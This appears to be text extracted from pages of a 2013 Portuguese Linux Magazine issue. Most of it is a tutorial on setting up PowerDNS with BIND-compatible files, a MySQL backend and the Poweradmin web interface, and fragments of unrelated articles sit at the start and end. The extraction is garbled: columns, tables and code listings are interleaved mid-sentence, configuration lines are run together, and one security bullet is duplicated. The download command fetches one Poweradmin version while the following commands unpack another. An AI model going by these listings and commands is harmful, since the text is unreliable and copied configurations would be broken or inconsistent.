Gostou do artigo?
Queremos ouvir sua opinião.
Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9010
Mais informações
[1] IPRoute2: http://www.
linuxfoundation.org/colla‑
borate/workgroups/ne‑
tworking/iproute2
[2] 6rd: http://en.wikipedia.org/
wiki/IPv6_rapid_deployment
[3] Descoberta de vizinhan-
ça: http://linux‑ip.net/gl/
ip‑cref/node156.html
[4] Banco de dados de políticas
de roteamento: http://linux‑ip.
net/html/routing‑rpdb.html
[5] CBQ: http://en.wikipedia.
org/wiki/Class‑based_queueing
57
 Tutorial
Zona de poder
O PowerDNS é uma solução de servidor DNS segura, escalonável e confiável, licenciado sob a GPL.
Neste artigo, mostramos como usar arquivos de configuração do BIND para configurar o servidor PowerDNS e
como criar um servidor primário com um backend MySQL gerenciado pela interface de usuário Poweradmin.
por Joseph Guarino
O
PowerDNS [1] é uma solu-
ção de DNS versátil e rica
em recursos. Original-
mente criado pela PowerDNS.com
BV como um produto comercial,
mais tarde foi aberto e licencia-
do sob a GPL. Hoje, o PowerDNS
floresce com contribuições tanto
comerciais [2] como comunitárias,
tornando-se um notável servidor
DNS alternativo.
Felizmente, não vivemos mais
nos primeiros dias da Arpanet
(rede precursora da Internet atu-
al), onde tínhamos que transfe-
rir grandes arquivos de um host
para outro de nó em nó. Sua
base de código compacto e foco
na segurança, escalonabilidade
e confiabilidade fazem do Po-
58
werDNS uma excelente escolha
de sistema gerenciador de DNS;
é bem empacotado com carac-
terísticas que impressionariam
qualquer administrador de rede
ou de sistemas (tabela 1).
Componentes
principais
O PowerDNS possui dois com-
ponentes principais e distintos:
o recursor e o servidor de auten-
ticação. Outros servidores de
DNS combinam esses recursos
em um único, mas o PowerDNS
os mantêm separadamente, e o
usuário pode configurá-lo como
qualquer outra opção. Um servi-
dor de autenticação de nomes
é exatamente o que parece: é
a fonte original e conclusiva da
zona de informação DNS para
um domínio particular, onde uma
zona é apenas uma parte ou con-
junto de espaço administrativo.
Servidores de autenticação de
domínio podem ser de dois tipos:
primário e secundário.
➧ O servidor de nomes primário
é às vezes chamado de servidor
principal, que é a fonte original e
definitiva para todos os registros
de zona de um domínio.
➧ O servidor de nomes secun-
dário, muitas vezes chamado de
servidor escravo (slave server), é
uma réplica idêntica usada para
fornecer redundância e alta dis-
ponibilidade.
www.linuxmagazine.com.br
 backend MySQL [4] de configu-
Servidor de autenticação DNS (hosting)
ração web com uma interface
Servidor de resposta DNS (caching) de usuário Poweradmin. Devi-
API para provisionamento de zonas e registros do a limitações de escopo e da
natureza bem documentada do
Suporte DNSSEC (como de 3.x)
projeto, o usuário será capaz de
Opções de gerenciamento baseadas na web construir as configurações con-
Armazenamento de dados DNS em texto puro (compatível com o BIND) forme a sua necessidade.
IPv4 e IPv6, UDP/TCP, 100% compatível [3]
Para esta parte do artigo, as-
sumiremos que o usuário tenha
Backend de bancos de dados MySQL, PostgreSQL, instalado o Ubuntu Server 12.04
Microsoft SQL Server, Oracle, Sybase
LTS e atualizado os patches cor-
Balanceamento de carga/algoritmos de failover retamente com os comandos:
Suporte SNMP
sudo aptitude update && aptitude
Estatísticas remotamente disponíveis para gráficos em tempo real dist-upgrade</code>.
Web server incorporado opcional
Ferramentas de debugging Instalação
Suporte a Linux, BSD, Unix e patches
Tabela 1 Recursos do PowerDNS. Seguindo em frente, desejamos
automatizar as atualizações para
O recursor do PowerDNS, por de dados do MRTG e RDD para o servidor PowerDNS. Para isso,
outro lado, simplesmente for- gráficos de rede mais elegantes usaremos o pacote unattendedupgra-
nece cache ou um uma solução ➧ Acesso local e remoto des para Ubuntu Server 12.04 LTS:
standalone de recursividade in- ➧ DNS64
sudo aptitude install unattended-
dependente para clientes que Outro componente do Po- upgrades
acessam a rede ou a Internet werDNS é o conjunto de re-
“maior” (ou seja, é a primeira li- cursos supermaster/supersla- Se escolher carregar as atua-
nha de DNS para máquinas clien- ve, que permite automatizar o lizações de segurança ao confi-
tes). Lembre- se de que ele não é provisionamento de servidores gurar o Ubuntu, este pacote já
autenticado, mas simplesmente escravos. As máquinas super- estará instalado. Configure-o ao
fornece resolução para as con- slaves podem configurar-se descomentar e alterar os itens
sultas feitas pelo cliente de rede automaticamente para a zona presentes na listagem 1 do arqui-
(a parte do lado cliente utilizada de onde recebem a notificação vo de configuração.
para realizar consultas DNS) na de um supermaster conhecido. Em seguida, edite o arquivo
sua máquina local. O recursor /etc/apt/apt.conf.d/10periodic para
PowerDNS suporta:
➧ Todas as normas relevantes
Backends verificar por atualizações uma
vez ao dia:
➧ Medidas avançadas de anti- PowerDNS APT::Periodic::Update‑Package‑Lis
spoofing É importante notar que o Po- ts "1";
➧ Reconfiguração sem tempo werDNS possui muitas opções APT::Periodic::U
de inatividade de configuração de backend para Download‑Upgradeable‑Packages "1";
APT::Periodic::AutocleanInterval
➧ Arquivos de zona BIND simples armazenar dados de zona. Ele "7";
➧ Interceptação de perguntas, pode usar arquivos de configu- APT::Periodic::Unattended‑Upgrade
recondicionamento de respostas, ração de compatibilidade BIND "1";
redirecionamento NXDOMAIN estáticos ou bancos de dados po-
(incluindo listas de bloco e me- pulares, que são muitos. Sendo Esteja ciente de que todas
didas de segurança) assim, limitaremos a cobertura as atualizações automáticas
➧ O utilitário rec_control, uma deste artigo ao seu uso como um estejam registradas em /var/
API para controle direto do re- servidor PowerDNS com confi- log/unattended‑upgrades, e assim
cursor PowerDNS e de saída guração compatível BIND e um poderá revê-las periodicamen-

Linux Magazine #107 | Outubro de 2013 59

 te, junto com outros logs. Além
disso, o usuário também pode
fazer a mesma coisa com o
Ubuntu Landscape comercial,
mais rico em recursos. Agora
que a base do sistema está
definida, podemos finalmente
executar a primeira instalação
do PowerDNS.
PowerDNS
recursor
Para este artigo, assumiremos
que o Ubuntu Server 12.04 LTS
esteja instalado em uma rede
local, atrás de um firewall. Co-
locamos o servidor por trás do
firewall de hardware em uma
rede interna, porque fazer um
servidor de cache disponível na
Internet pública é tão insensato
quanto fazê-lo com um proxy ou
retransmissão de email aberto.
Fazer a instalação é fácil:
sudo apt‑get install pdns‑recursor
Listagem 1: Configuração de
atualizações automáticas
01 nano /etc/apt/apt. de dados DNS, ou então talvez
conf.d/50unattended‑upgrades
02 // Automatically upgrade Listagem 2: Personalização
packages from these
(origin:archive) pairs Unatt
ended‑Upgrade::Allowed‑Origins
{"${distro_id}:${distro_
codename}‑security";
"${distro_id}:${distro_
codename}‑updates";
03 // Send email to this
address for problems or
packages upgrades
04 // If empty or unset then
no email is sent, make sure
that you
05 // have a working mail
setup on your system. A
package that provides
06 // 'mailx' must be
installed. E.g. "user@
example.com"
07 Unattended‑Upgrade::Mail
"username@yourdomain.com";
# Load kernel module
60
Agora será necessário perso-
nalizar o arquivo de configuração
/etc/powerdns/recursor.conf. Por
uma questão de brevidade, só
incluímos as variáveis de confi-
guração alteradas neste material
(listagem 2). Com o arquivo recur-
sor.conf modificado, reiniciamos
o pdns-recursor com o comando
sudo service pdns‑recursor restart.
O Ubuntu mudou para Upstart
no lugar do SysVinit, por isso
ao invés do velho método /etc/
init.dstart/stop/restart, usamos o
Upstart com a seguinte sintaxe:
sudo service <nome_do_servico>
stop/start/restart
Controle
do recursor
Um programa incluído, o rec_con-
trol, permite interagir e controlar
o recursor do PowerDNS, que pode
ser utilizado para obter estatísticas,
verificar o status do recursor ou até
mesmo desativá-lo. Neste exemplo:
$ sudo rec_control ping
$ sudo rec_control get‑all
$ sudo rec_control get variable
$ sudo rec_control quit
do recursor.conf
01 allow‑from=192.168.1.0/24
02 # The 'allow‑from' address
specifies the network address
space you want to service
queries to with your PowerDNS
recursor. Note you can use
comma‑ separated individual IPs
or networks in CIDR notation.
03 local‑address=192.168.1.10
04 #'local‑address' specifies
the address or addresses on
which the recursor is to
listen for queries.
05 # version‑string=Wait,
this ain't no host file
06 # Give out bogus version
information when queried with
'dig @ns1.example.com ‑c CH
‑t txt version.bind'. I'd
rather add some mystery. =)
os comandos primeiramente tes-
tam se o servidor está ativo, em
seguida colhem estatísticas de
variáveis, colhem uma variável
específica e finalmente aban-
donam o PowerDNS. Note que
é possível consultar muitas va-
riáveis com o rec_control, que o
usuário pode utilizar para gerar
gráficos RDD.
Como mencionamos anterior-
mente, o PowerDNS suporta uma
variedade de bancos de dados
de backend para armazenar as
zonas de dados. Muitas vezes,
o PowerDNS estará configura-
do com um backend de banco
de dados (MySQL, PostgreSQL,
Microsoft SQL Server, Oracle,
Sybase) e não como arquivos de
texto simples (BIND backend).
Na primeira parte deste arti-
go, exploraremos o uso de uma
configuração compatível com o
BIND para situações em que o
usuário não deseja usar um ban-
co de dados. Por exemplo, uma
pequena organização pode estar
confortável com a configuração
do BIND ou não desejar a com-
plexidade de manter um banco
já esteja em transição do BIND
para o PowerDNS.
Listagem 3: Configuração de
servidor de DNS primário
01 sudo nano example.com.zone
example.com. 84600 IN SOA
ns1.example.com.
02 hostmaster.example.com. (
03 2013062901 ; serial 21600
; refresh (6 hours) 900 ;
retry (15 minutes) 604800 ;
expire (1 week) 3600 ;
minimum (1 hour) )
04 NS ns1.example.com
05 NS ns2.example.com
06 MX 10 mail.example.com
07 ns1 A 192.168.1.10
08 ns2 A 192.168.1.11
09 mail A 192.168.1.13
10 www A 192.168.1.14
www.linuxmagazine.com.br

Listagem 4:
bindbackend.conf
01 sudo nano bindbackend.conf
02 options {
03 directory "/etc/powerdns";
04 };
05
06
zone "example.com" {
type master;
07 file "example.com.zone";
08 };
Seja qual for a razão, o Po-
werDNS possui uma maneira fácil
de utilizar os arquivos de configu-
ração da zona mestre do BIND para
configurar o servidor PowerDNS.
Na segunda parte deste artigo,
cobriremos o uso do PowerDNS
com um backend MySQL.
PowerDNS e BIND
Nesta configuração, criaremos dois
servidores (que também podem ser
máquinas virtuais ou instâncias de
nuvem) para os servidores primário
e secundário na DMZ (zona desmi-
litarizada) para os serviços de aces-
so público. Para começar, o usuário
precisa instalar o PowerDNS em
seu servidor mestre ou primário:
sudo apt‑get install pdns‑server
O exemplo de configuração do
servidor DNS primário PowerDNS
presente em /etc/powerdns é mostra-
do na listagem 3 (para simplificar, o
exemplo omite a zona de DNS re-
versa, mas recomendamos que o
usuário a crie. Ao contrário da zona
de encaminhamento, que mapeia o
nome do host para o endereço IP, a
zona reversa mapeia o oposto – o
endereço IP para o nome do host).
Muitos serviços de rede e apli-
cativos requerem mapeamento
de zona reversa, por isso é uma
boa ideia adicioná-la. Crie também
uma versão reduzida do arquivo
named.conf (arquivo de configura-
ção do BIND), em /etc/powerdns
contendo o essencial (listagem 4).
Configuração
de arquivo
Os serviços gerais do PowerDNS
são regidos por um único arquivo
de configuração, /etc/powerdns/
pdns.conf, ao qual é necessário
adicionar as linhas da listagem 5.
Quando configurado correta-
mente, execute o comando sudo
service pdns restart para reiniciar
o serviço PowerDNS.
Servidor
secundário
Para obter a configuração, primeiro
precisamos instalar o PowerDNS
no servidor secundário ou escravo
com o comando sudo apt‑get install
pdns‑server. Assim como aconteceu
com o servidor principal, criamos
uma versão reduzida do arquivo
named.conf (o arquivo de configu-
ração do BIND antigo), em /etc/
powerdns/bindbackend.conf, contendo
apenas o essencial:
sudo nano bindbackend.conf
options {
directory "/etc/powerdns";
};
zone "example.com" {
type slave;
file "example.com.zone";
masters { 192.168.1.10; };
};
Note que, como estamos exe-
cutando com o setgid/setuid do
usuário pdns no servidor escravo,

Listagem 5: Inclusões no arquivo pdns.conf

01 allow‑axfr‑ips=192.168.1.11
02 # IP Address allowed to perform AXFR.
03 #
04 bind‑check‑interval=300
05 # Tell server how often to check for zone changes.
06 #
07 launch=bindbind‑config=/etc/powerdns/bindbackend.conf
08 # Tell PowerDNS to launch with BIND back end using the specified configuration file.
09 #
10 local‑address=192.168.1.10
11 # Specifies the local IP on which PowerDNS listens.
12 #
13 master=yes
14 # Tells PowerDNS to run this as the primary server. This primary server will send out a special notify
packet to notify the secondary or slave of updates.
15 #
16 setgid=pdns
17 # Sets Group ID to pdns for improved security
18 #
19 setuid=pdns
20 # Sets user id to pdns for improved security
21 #
22 version‑string=anonymous
23 # No server version is divulged via dig query (e.g.,dig @ns1.example.com ‑c CH ‑t txt version.bind). I'd
rather make script kiddies work harder. =)

Linux Magazine #107 | Outubro de 2013 61

 Listagem 6: Listagem 7: Criação de um servidor DNS mestre
Configuração de servidor
01 #
de DNS secundário 02 # MySQL back end configuration
03 #
01 launch=bind
04 launch=gmysql
02 bind‑config=/etc/powerdns/
05 # Tells our PowerDNS server we are using MySQL backend
bindbackend.conf
06 config‑dir=/etc/powerdns/pdns.d/
03 # Tell PowerDNS to launch
07 # Specifies our configuration file
with BIND back end using the
08 gmysql‑host=127.0.0.1
specified configuration file
09 # Configures the IP address that PowerDNS will listen on
04 #
10 gmysql‑user=puser
05 bind‑check‑interval=300
11 # Our configured PowerDNS username
06 # Tell server how often to
12 gmysql‑password=pleasepick astrongpassword
check for zone changes
13 # This is our MySQL password. Please, for the love of all that
07 #
is sacred, stop using weak passwords!
08 local‑address=192.168.1.11
14 gmysql‑dbname=pdns
09 # Specifies the local IP
15 # This details which MySQL database PowerDNS should use.
on which PowerDNS listens
16 local‑address=192.168.1.10
10 #
17 # Specifies the local IP for PowerDNS to listen on.
11 setgid=pdns
18 master=yes
12 # Sets Group ID to pdns
19 # This tells PowerDNS to run this as the primary server. This
for improved security
primary server will send out a special notify packet to notify the
13 #
secondary or slave of updates.
14 setuid=pdns
20 setgid=pdns
15 # Sets user id to pdns for
21 # Sets Group ID to this one for improved security
improved security
22 setuid=pdns
16 #
23 # Sets user id to this for improved security
17 slave=yes
24 version‑string=Hostfile 0.1 Alpha
18 # Variable identifies this
25 # Bogus server version is divulged via dig quiry, such as
server as a secondary or
dig @ns1.example.com ‑c CH ‑t txt version.bind. There is no
slave server
security through obscurity, but there is certainly absurdity... =P
19 #
20 version‑string=anonymous
21 # No server version is
divulged via a dig inquiry Depois de colocar os servido- siga em frente e experimente
(e.g., dig @ns1.example.com res em funcionamento, podemos o domínio recém-criado. Assim
‑c CH ‑t txt version.bind).
Oh, the mystery! consultá-los para verificar os re- como acontece com o recursor,
gistros e verificar o arquivo de log o PowerDNS contempla ainda
em /var/log/syslog para assegurar mais ferramentas e utilitários,
precisamos mudar de proprietá- que eles estejam realmente se sendo que o pdns_control está
rio e de grupo para esse usuário comunicando (quadro 1). Agora, entre eles (tabela 2).
com o comando:
sudo chown ‑R pdns:pdns /etc/ Ação Comando
powerdns Teste para saber se o
sudo pdns_control ping
Para configurar um servi- servidor está ativo
dor DNS secundário com um Limpar as entradas de cache sudo pdns_control purge
backend BIND (arquivos de Informar ao backend que
configuração de texto compa- os conteúdos dos domínios sudo pdns_control reload
tíveis com BIND), precisamos foram alterados
adicionar as linhas da listagem
6 ao arquivo pdns.conf (localiza- Exibir estatísticas de uso sudo pdns_control status
do no diretório /etc/powerdns). Exibir uma estatística específica
sudo pdns_control <variable>
Finalmente, desejamos fazer (use * para detalhes)
o HUP ou reiniciar o serviço Reiniciar uma instância PowerDNS sudo pdns_control cycle
PowerDNS com sudo service
pdns restart. Tabela 2 Como usar o pdns_control.

62 www.linuxmagazine.com.br
 Quadro 1: Como testar o servidor PowerDNS Listagem 8: Criação
Tão logo o servidor esteja em execução, devemos testá-lo para ter cer- de banco de dados
teza de que está funcionando:
01 use pdns;
dig +norecurs @127.0.0.1 ns1.example.com A 02 create table domains (
03 id INT auto_increment,
; <<>> DiG 9.9.2‑P1 <<>> +norecurs @127.0.0.1 ns1.example.com A 04 name VARCHAR(255) NOT NULL,
; (1 server found) 05 master VARCHAR(128)
;; global options: +cmd DEFAULT NULL,
;; Got answer: 06 last_check INT DEFAULT NULL,
;; ‑>>HEADER<<‑ opcode: QUERY, status: NOERROR, id: 62937 07 type VARCHAR(6) NOT NULL,
;; flags: qr aa; QUERY: 1, ANSWER: 08 notified_serial INT
1, AUTHORITY: 0, ADDITIONAL: 0 DEFAULT NULL,
09 account VARCHAR(40)
;; QUESTION SECTION: DEFAULT NULL,
;ns1.example.com. IN A 10 primary key (id)
11 ) Engine=InnoDB;
;; ANSWER SECTION:
12 CREATE UNIQUE INDEX name_
ns1.example.com. 86400 IN A192.168.1.10 index ON domains(name);
13 CREATE TABLE records (
Se o servidor não estiver respondendo às consultas, podemos começar 14 id INT auto_increment,
a solucionar o problema verificando se o PowerDNS está sendo execu- 15 domain_id INT DEFAULT NULL,
tado com o comando ps e checando os logs de sistema (syslog). Além 16 name VARCHAR(255) DEFAULT NULL,
disso, o pacote de recursos PowerDNS inclui o aplicativo pdns_control, 17 type VARCHAR(10) DEFAULT NULL,
que permite ver o status do servidor, reiniciar e, geralmente, controlar 18 content VARCHAR(64000)
o PowerDNS (tabela 2). DEFAULT NULL,
19 ttl INT DEFAULT NULL,
20 prio INT DEFAULT NULL,
21 change_date INT DEFAULT NULL,
Servidor de construiu seu servidor e fez o
patch como descrito acima, an-
22 primary key(id)
autenticação tes de continuar com o restante
23 ) Engine=InnoDB;
24 CREATE INDEX nametype_
Como afirmado anteriormente, o deste exercício. index ON records(name,type);
PowerDNS suporta uma impres- 25 CREATE INDEX domain_id ON
sionante variedade de bancos de Criação de records(domain_id);
26 create table supermasters (
dados para armazenar as zonas
de dados; no entanto, limitare-
um servidor 27 ip VARCHAR(64) NOT NULL,
28 nameserver VARCHAR(255)
mos nossa cobertura ao restante DNS mestre NOT NULL,
deste artigo para seu uso com Para obter a configuração, o 29 account VARCHAR(40)
DEFAULT NULL
um servidor principal com um usuário precisa instalar o Po-
30 ) Engine=InnoDB;
backend MySQL com interface werDNS no servidor primário ou 31 quit; Joseph Guarino.
de usuário web Poweradmin. mestre, modificando as linhas
O ambiente de exemplo será mostradas na listagem 7 em /etc/
sudo service pdns restart
construído sobre o Ubuntu Ser- powerdns/pdns.d/pdns.local.gmysql.
ver 12.04 LTS Precise Pangolin, e Finalmente, reinicie o serviço Com uma configuração Po-
estamos supondo que o usuário PowerDNS com: werDNS base e servidores funcio-
nando, podemos instalar os pacotes
e configurar o backend MySQL.

Banco de
dados MySQL
Para começar, instale o MySQL
com o comando:

primary:~$sudo apt‑get install

Figura 1 Selecione o idioma do sistema. mysql‑server mysql‑common

Linux Magazine #107 | Outubro de 2013 63


Figura 2 Insira suas informações MySQL.
Como parte da instalação, o
usuário será solicitado a definir
as senhas de root do MySQL.
Procure escolher uma senha
forte. O servidor a ser confi-
gurado precisa de um pouco
de ajuste antes de receber os
bancos de dados e usuários,
então edite o aquivo /etc/mysql/
my.cnf em seu editor de texto
favorito. Neste caso, mude o
endereço para o qual o MySQL
escuta em seu servidor local:
Bind‑address = 127.0.0.1
Agora podemos nos conectar
ao recém-criado servidor MySQL
e começar sua configuração:
primary:~$mysql ‑h localhost ‑u
root ‑p
Em seguida, crie e configure
um banco de dados MySQL com
o comando create database pdns;
e então adicione um usuário que
terá acesso ao banco e defina
suas permissões:
GRANT ALL ON pdns.* TO
'puser'@'localhost' IDENTIFIED BY
'pleasepickastrongpassword';
GRANT ALL ON pdns.* TO
'puser'@'localhost.localdomain'
IDENTIFIED BY
'pleasepickastrongpassword';
FLUSH PRIVILEGES;
Agora podemos criar o banco
de dados necessário para a insta-
lação do PowerDNS (listagem 8).
Claro, podemos fazer muito mais
para proteger o MySQL [5] mas,
64
por uma questão de brevidade,
não incluiremos aqui outros de-
talhes sobre o assunto. Como
qualquer outro aplicativo, ele
precisa de uma atenção extra
para melhorar a segurança de
seu estado instalado por padrão.
Poweradmin
Neste ponto, podemos geren-
ciar a configuração backend do
PowerDNS de muitas maneiras.
Ao contrário da configuração de
arquivo baseada em texto sim-
ples (o backend compatível com
o BIND mencionado na primei-
ra parte deste artigo), teríamos
que usar algumas ferramentas
de gerenciamento de banco de
dados, criar scripts próprios ou
usar uma interface de administra-
ção web. Geralmente, se o usuá-
rio não planeja criar o script ou
o código de sua própria solução,
optar por uma interface gráfica
de usuário é uma boa escolha. A
interface gráfica oferece muitos
benefícios: facilita a administra-
Figura 3 Insira suas informações de domínio DNS básico.
ção, incentiva a sintaxe apropriada
e diminui erros sintáticos.
O Poweradmin é uma uma in-
terface amigável, fácil de usar e
de código aberto que suporta os
principais recursos do PowerDNS.
Com este aplicativo web rico em
recursos, o usuário poderá ge-
renciar o ambiente de DNS sem
maiores problemas. No entan-
to, antes de começar, é preciso
instalá-lo. Como a maioria dos
aplicativos, ele possui alguns
pré-requisitos:
➧ MySQL ou PostgreSQL
➧ Apache
➧ PHP
➧ Módulos PHP: session, gettext
e mcrypt
➧ PEAR, PEAR::MDB2
➧ GNU gettext
Na falta de um pacote Powera-
dmin específico, o usuário precisa
verificar esses pré-requisitos e,
em seguida, instalar seus binários:
sudo apt‑get install apache2
libapache2‑mod‑php5 php5
php5‑common php5‑curl php5‑dev
php5‑gd php‑pear php5‑imap
php5‑mcrypt php5‑common php5‑ming
php5‑mysql php5‑xmlrpc gettext
sudo pear install MDB2
sudo pear install MDB2_Driver_mysql
Desta forma será possível fi-
nalmente instalar o aplicativo
Poweradmin:
cd /tmp
wget https://github.com/downloads/
Poweradmin/Poweradmin/
Poweradmin‑2.1.6.tgz
tar xvfz Poweradmin‑2.1.4.tgz
www.linuxmagazine.com.br
 Figura 4 Instruções sobre como conceder direitos ao Poweradmin.
mv Poweradmin‑2.1.4 /var/www/
Poweradmin
touch /var/www/Poweradmin/inc/
config.inc.php
chown ‑R www‑data:www‑data /var/
www/Poweradmin/
Observe que destacamos ape-
nas os passos que podem exigir
alguma personalização do usuá-
rio. Medidas óbvias (exibidas
nas figuras 1-4) foram explicita-
mente excluídas. Uma vez que
o usuário tenha configurado o
Poweradmin, poderá acessar o
endereço http://localhost/Powe-
radmin/install/index.php.
Para que o Poweradmin atua-
lize os dados nas tabelas, o usuá-
rio precisa fornecer ao programa
alguns direitos limitados. Para
fazer isso, crie um novo usuário
e defina os direitos de selecio-
nar, apagar, inserir e atualizar
registros no banco de dados
PowerDNS. Depois de adicio-
nar o novo usuário, volte para
o MySQL e execute:
mysql ‑h localhost ‑u root ‑p
use pdns;
GRANT SELECT, INSERT, UPDATE,
DELETE ON pdns.* TO
'padmin'@'localhost' IDENTIFIED
BY 'pleasepickastrongpassword';
quit;
Uma vez concluída a confi-
guração inicial, o usuário deve
fazer mais uma coisa por ques-
tões de segurança:
rm ‑fr /var/www/Poweradmin/install/
Linux Magazine #107 | Outubro de 2013
Isso irá remover o diretório
de instalação. Assim como ou-
tros aplicativos web baseados
em PHP, o Poweradmin possui
um arquivo de configuração
principal que pode ser editado
e personalizado no arquivo /var/
www/Poweradmin/inc/config.inc.php.
Caso queira personalizar ainda
mais o arquivo de configuração,
poderá editar este ou explorar
o restante dos subdiretórios
deste aplicativo.
Login no
Poweradmin
Para acessar o servidor Powe-
radmin, acesse http://localhost/
Poweradmin/index.php. Uma vez lá,
adicione a zona mestre clican-
do em Add master zone in the
initial login screen (Adicionar
zona mestre na tela de login
inicial) (figura 5), as informa-
ções necessárias para a base
de domínio, e clique em Add
zone (Adicionar zona) (figura 6).
A partir daqui, clique em List
zones (Listar zonas) ( figura 7)
Figura 6 Inclusão de uma zona mestre.
Figura 5 Interface web de usuário
de gerenciamento Poweradmin.
e, em seguida, Edit an existing
example.com zone (Editar uma
zona example.com existente),
como ilustrado na figura 8.
Como podemos ver, a interfa-
ce gráfica é muito simples e irá
guiá-lo através do processo de
criação dos registros de DNS bási-
cos. Uma vez feito isso, volte para
o mesmo domínio e adicione os
registros adicionais que desejar.
Redundância
Redundância é uma obrigação.
Como qualquer serviço tão vital
quanto o DNS, devemos criar
redundância na infraestrutura
– o que significa, pelo menos,
dois ou mais servidores, se
possível – ou então o usuário
precisará de muito mais do que
duas aspirinas para lidar com
as dores de cabeça causadas
pelo tempo de inatividade. No
65

Figura 7 Listagem de zonas existentes.
caso do PowerDNS, isso signifi-
ca dois ou três servidores DNS.
Se estiver usando um backend
de banco de dados, o usuário
não deve possuir um backend
único para toda a sua infraes-
trutura; ao invés disso, deve
combiná-los com um backend
por servidor PowerDNS.
DNS e segurança
DNS é um serviço comumente
explorado, o que significa que o
usuário não deve ter pressa nas
fases de engenharia necessárias
para implementá-lo corretamen-
te. Infelizmente, o DNS possui
numerosos vetores de ataque.
Os riscos para um serviço tão
crítico como o DNS para o fun-
cionamento da rede são mui-
tos, mas o usuário pode tomar
algumas medidas simples para
melhorar isso:
➧ Patch, patch, patch. Por
mais bobo que pareça, algumas
pessoas não acreditam ou não
investem em automatização de
gerenciamento de patches; no
entanto, fazer isso ajudará a
resolver muitas questões im-
portantes.
➧ Divisão de servidores atra-
vés das redes. Colocar todos
os servidores de DNS em um
único espaço de rede pode ser
altamente problemático se o
66
roteador principal morrer ou a
rede sofrer um ataque de ne-
gação de serviço distribuído.
Divida os servidores em várias
infraestruturas de rede/servi-
dor, devidamente redundantes
e tolerantes a falhas.
➧ Servidores de divisão atra-
vés das redes. Colocar todos os
seus servidores de DNS em um
único espaço de rede pode ser
altamente problemático se esse
roteador quebrar ou a rede so-
frer um ataque distribuído de
negação de serviço. Divida seus
servidores em vários, devida-
mente redundantes e toleran-
tes a falhas de infraestrutura
de rede/servidor.
➧ Configurar firewalls. Em-
bora os firewalls não sejam
perfeitos, ainda são uma boa
Figura 8 Edição de uma zona existente.
prática. Acionar o iptables no
servidor de de DNS irá, no mí-
nimo, incluir camadas adicio-
nais para impedir o acesso de
pessoas com intenções malicio-
sas. Além disso, pensar sobre
regras de entrada e saída com
serviços de rede é sempre uma
boa disciplina. Uma opção no
Ubuntu é usar a ferramenta
“firewall descomplicado”, que
ajuda a criar regras iptables de
uma forma bastante simples.
Para o nosso exemplo, criamos
as seguintes regras de firewall
sem complicações:
sudo ufw enable
primary:~$ufw logging on
primary:~$ufw default deny
primary:~$ufw allow 22/tcp
primary:~$ufw allow 80/tcp
primary:~$ufw allow 53/udp
primary:~$ufw allow 53/tcp
primary:~$ufw status
Claro, se o usuário estiver mais
confortável fazendo isso com o
iptables, siga em frente. Regras
mais rigorosas podem estar em
ordem, dependendo do ambien-
te e objetivos.
➧ Explorar e implementar
TSIG/TKEY e DNSSEC. Use TSIG/
TKEY [6] [7] para zonas de trans-
ferência seguras e implemente
DNSSEC [8] para ajudar a pro-
teger o servidor contra enve-
www.linuxmagazine.com.br
nenamento de cache. Uma do-
cumentação abundante sobre
esses recursos está disponível
[9]. Quando o desenvolvedor
colocar a segurança como pri-
meiro passo de qualquer proje-
to, o conjunto de problemas é
reduzido drasticamente.
Servidores
secundários
e terciários
Agora que um servidor primário
está instalado e funcionando,
teremos mais trabalho a fa-
zer para criar uma verdadeira
redundância. Como dissemos
antes, possuir qualquer pon-
to de falha (SPOF) é sempre
imprudente. Para esse fim,
temos várias maneiras de criar
um servidor secundário. Devi-
do a limitações de escopo e à
natureza bem documentada do
projeto [10] [11], o usuário terá
condições de adicionar servi-
dores secundário e terciários
conforme sua necessidade.
PowerDNS
e opções
de suporte
Como a maioria dos projetos de
código aberto, o suporte está
disponível através de vários ca-
minhos. O PowerDNS é apoia-
do pela comunidade através
de listas de discussão, fóruns,
IRC [12], e de um ecossistema
de parceiros e organizações de
serviços profissionais e de apoio
comercial, mesmo direto da Po-
werDNS BV [13]. Muitas vezes,
o apoio comercial ajuda, pelo
menos sob a forma de recur-
sos e suporte da comunidade,
em um projeto de código aber-
to; este é certamente o caso
Linux Magazine #107 | Outubro de 2013
com o PowerDNS. O suporte para versões antigas que ainda se
corporativo e uma comunida- aplicam a novas versões, tornan-
de de alta qualidade tornam o do mais claros os tickets incertos
projeto ótimo para usuários de e a escrita de patches
qualquer faixa – corporativos ou ➧ Definição de importância e
não. Projetos de código aberto implementação dos muitos itens
prosperam quando os indivídu- da “to-do list” do projeto [15]
os se envolvem, e o PowerDNS Se o usuário for engajado,
contempla uma série de opor- essas tarefas oferecerão uma
tunidades, incluindo: ótima maneira de se envolver
➧ Ressurgimento do suporte em um projeto de software li-
ao Mac OS X
➧ Resolução de problemas de
vre e aberto (FOSS). As oportu-
nidades de aprendizagem são
pacote para Solaris abundantes, e as contribuições
➧ Teste de backends melhorariam a infraestrutura
➧ Testes de regressão [14] crítica da Internet atual. Espe-
➧ Coleta e documentação de ramos que este pequeno arti-
diversos frontends web go aguce o apetite de explorar
➧ Gerenciamento de tickets: este software DNS poderoso,
verificação de bugs reportados rico em recursos e flexível. n
Gostou do artigo?
Queremos ouvir sua opinião. Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/8981
Mais informações
[1] PowerDNS: http://www.powerdns.com/
[2] Suporte PowerDNS: https://www.powerdns.com/support.html
[3] PowerDNS compliance: https://www.powerdns.com/compliance.html
[4] Poweradmin: https://www.poweradmin.org/
[5] Segurança MySQL: http://dev.mysql.com/
doc/refman/5.6/en/security.html
[6] TSIG: http://tools.ietf.org/html/rfc2845
[7] TKEY: http://tools.ietf.org/html/rfc2930
[8] DNSSEC: http://www.dnssec.net/
[9] Documentação do Poweradmin: https://www.po-
weradmin.org/trac/wiki/Documentation
[10] Manual do PowerDNS: http://doc.powerdns.com/html/index.html
[11] Documentação do PowerDNS: https://www.
powerdns.com/documentation.html
[12] PowerDNS IRC: #powerdns on OFTC (irc.oftc.net)
[13] PowerDNS BV: https://www.powerdns.com/support.html
[14] Testes de regressão: http://wiki.powerdns.
com/trac/wiki/WritingRegressionTests
[15] PowerDNS to-do list: http://wiki.powerdns.com/trac/wiki/TodoList
67
 Android
Máquina de produção
Transforme seu dispositivo Android em uma máquina de produtividade
enxuta com aplicativos de código aberto.
por Dmitri Popov

H
oje em dia, até mesmo um
dispositivo Android de mé-
dio desempenho possui po-
der de processamento suficiente
para lidar com a maioria das tarefas
de produtividade – do gerencia-
mento de emails à elaboração de
